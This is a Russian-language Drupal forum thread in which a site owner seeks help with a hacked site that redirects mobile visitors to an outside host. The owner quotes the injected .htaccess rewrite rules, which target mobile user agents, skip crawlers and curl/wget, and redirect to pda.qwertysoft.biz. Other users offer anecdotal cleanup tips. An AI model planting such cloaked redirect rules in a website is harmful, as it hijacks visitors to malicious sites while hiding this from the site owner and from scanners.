Переадресация с Мобильных устройств (например с планшета) не левый (не Мой сайт) m.touchads.biz

Главные вкладки

Аватар пользователя Друпал-юзер Друпал-юзер 16 сентября 2014 в 1:20

Расположил сайт на VPS-сервере.
Заметил что при переходе с мобильного устройства(например С планшета ) переадресовывается с моего сайта на левый m.touchads.biz
Браузер выдает Предупреждение, А после Если Перейти, открывается левый сайт.

При обращении к Сайту с настольного Компьютера - все нормуль.
Проверил Сайт (Сервер ) Антивирусом Linux Malware Detect. - ничего не нашел
В htaccess были Следующие строки:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://pda.qwertysoft.biz/?29&source=test.xxxxxll.ru [L,R=302] # on
RewriteRule "(^|/)\." - [F]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !=/favicon.ico
RewriteRule ^ index.php [L]

Закомментировал эти:
# RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
# RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
# RewriteRule (.*) http://pda.qwertysoft.biz/?29&source=test.xxxxxll.ru [L,R=302] # on

Ничего не изменилось
Полностью удалил их
Ничего Не изменилось.
Сервер перезагружал.

Где искать траблу?

ВложениеРазмер
Иконка изображения virus.png231.47 КБ

Комментарии

Аватар пользователя artkretov artkretov 16 сентября 2014 в 9:10

было похожее что-то давно уже, строки тоже вычищал.
на сколько помню помимо htaccess - заражают ещё пару файлов, проблему решал тупо обновлением движка.

Антивирусом Linux Malware Detect. - не знаю про такой, попробуйте онлайн антивирусы (проверка сайтов) таких в сети навалом.

Меняйте пароли от входа, я подцепил такую дрянь приложением Drupal для андроида, когда ввёл в него логин и пароль.

Аватар пользователя Друпал-юзер Друпал-юзер 16 сентября 2014 в 15:16

1.)"на сколько помню помимо htaccess - заражают ещё пару файлов,"
Знать бы ещё что это были за файлы... Sad
2.)"проблему решал тупо обновлением движка."
Обновил с 7.22 до 7.31 (+ все Модули)
3.)"я подцепил такую дрянь приложением Drupal для андроида, когда ввёл в него логин и пароль."
Недавно устанавливал на Android
Drupal Livetracking
и
Drupal Editor
Но пароль илогин вводил вроде только в Drupal Livetracking ... Sad
Удалил Оба приложения с устройства
4.)"Меняйте пароли от входа"

Сменил пароль от админки

Пока что действия не возымело ... Sad

Аватар пользователя Друпал-юзер Друпал-юзер 16 сентября 2014 в 15:38

Проверил другой Человек на устройстве Android - у него проблем нет, так Что Возможно заражено мое устройство, а не Сайт(хостинг ), но вы kedax, пишите что "помимо htaccess - заражают ещё пару файлов ".
Вот узнать бы Что ещё это за файлы.
Вы не Можете Подсказать, вспомнить, В каком направлении,(хотя бы ) их искать?

Аватар пользователя xSPiRiTx xSPiRiTx 17 сентября 2014 в 22:01

у меня была похожая проблема на Джумле. нашел вредоносный код, который разбросался по всей файловой системы джумлы, был в файлах .js
я тогда брал оригиналы этих файлов и сравнивал их со своими. вырезал лишний код. вирус ушел, но модули стали работать некорректно.

вылечилось переводом сайта на друпал

Аватар пользователя Друпал-юзер Друпал-юзер 18 сентября 2014 в 19:43

ХулиGUN, sas@drupal.org,
А по существу можно что сказать?
Мелансон Б., Нордин Д., Луиси Ж. и др.
Профессиональная разработка сайтов на Drupal 7
"Наличие огромного сообщества разработчиков, дизайнеров и создателей тем означает,
что даже самый неопытный пользователь Drupal может легко получить ответ на возник­
ший у него вопрос. Иногда достаточно опубликовать в Твиттере вопрос с тегом #Drupal,
чтобы получить помощь, о которой вы и не мечтали
. "
- Наивный Мелансон, наверное Плохо представляет, Что за Пределами англоязычной среды ситуация совершенно другая.
(Как и по этому вопросу - http://www.drupal.ru/node/112403 , который для меня даже важнее чем эта тема с заражением)
Не первый день в интернете, и знаю что на форумах мне никто ничего не должен,
Но все-таки официальное сообщество ...
Люди по 4 по 7 лет в сообществе, а на элементарный вопрос об изменении системного пути картинок, что выше ссылку привел,
ответить не находят времени, кроме как через htaccess все решать.
Видимо любой вопрос решить можно, но только за деньги...

Аватар пользователя Друпал-юзер Друпал-юзер 18 сентября 2014 в 19:53

"ХулиGUN" wrote:
По существу чего? поиска заразы на сервере? Или у Вас в телефоне?
Если на сервере сравниваете файлы по дате последнего изменения... если отличается от предположительно нормальной, то заглядываете внутрь... ищете подозрительный код и удаляете....
Проверьте права на запись у файлов сервера
Смените доступы
Если это сервак, то советую так же просмотреть конфиги хостов сервера, сменить пароль и порт к ssh
Если это телефон, то обратитесь к специалистам в этой области...
В случае с серверной проблемой впринципе советую сделать то же самое

Пока Писал вам пасквиль, изменяя сообщение перед вами, вы мне ответили)
Да, на сервере, на телефоне(на планшете ), я думаю простой переустановкой OS решить проблему если не смогу иначе. А на сервере, kedax столкнувшись С подобной проблемой, писал,

"kedax" wrote:
помимо htaccess - заражают ещё пару файлов,
, так что я htaccess изменил, но по опыту заражения в прошлом, на других CMS, знаю, что возможно заражение и других файлов на сервере, как и писал kedax.
Да, спасибо за мысль об изменении времени файлов, я об этом не думал.
Хулиган, а вы не Можете по вопросу системного пути картинок, мой первый вопрос в сообществе, что я выше ссылку привел, ответить-подсказать, кроме как изменения htaccess, вы поскольку модули, и темы и дизайн на заказ изменяете, возможно знаете, как с системными пути, с ядром работать ...
(- этому http://www.drupal.ru/node/112403)